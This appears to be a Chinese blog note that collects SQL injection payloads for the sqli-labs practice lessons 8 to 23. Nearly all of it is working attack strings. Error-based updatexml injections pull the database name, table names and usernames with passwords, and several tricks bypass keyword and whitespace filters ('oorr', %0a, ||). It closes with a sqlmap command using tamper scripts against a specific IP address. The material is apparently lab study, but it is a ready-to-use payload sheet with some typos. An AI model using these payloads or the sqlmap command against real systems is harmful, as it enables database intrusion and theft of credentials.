8-22
'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or'
'or updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='security'),0x7e),1) or'/
'or updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) or'
'or updatexml(1,concat(0x7e,(select password from users limit 5,1),0x7e),1) or'/
'or updatexml(1,concat(0x7e,(select group_concat(username,;,passsword) from users ),0x7e),1) or'/
' or (updatexml(1,concat(0x7e,(SELECT concat_ws(':',username,password) FROM (SELECT username,password FROM users)text LIMIT 0,1),0x7e),1)) or '
"or updatexml(1,concat(0x7e,(select database()),0x7e),1) or"
23
' and 1=1 or '1'='1
and updatexml(1,concat(0x7e,(select database()),0x7e),1) or '1'='1/
'or updatexml(1,concat(0x7e,(select database()),0x7e),1) or'
?id=1'and 1=1; %00
?id=-1' union select 1,2,database(); %00
'|| updatexml(1,concat(0x7e,(select database()),0x7e),1) ||'
或者 oorr 或者 ||替换掉
and 也以用 && aandnd 或者%26%26替换掉
‘#’ 也以用 or ‘1’='1 替换掉
在这里有一个陌生的符号:\s: 是匹配所有空白符,包括换行,\S 非空白符,不包括换行。也就是说在这里我们无法使用空格 ,\s会将其消掉。
%0a可以代替空格,或者使用()将其包起来
'oorr%0aupdatexml(1,concat(0x7e,(select database()),0x7e),1)%0aoorr'
/sqlmap.py -u "http://124.70.71.251:40584/new_list.php?id=1" --tamper tamper/between.py,tamper/randomcase.py,tamper/space2comment.py -v 3
标签:py,database,28,updatexml,0x7e,lib8,concat,sql,select From: https://www.cnblogs.com/sjzdest/p/16975825.html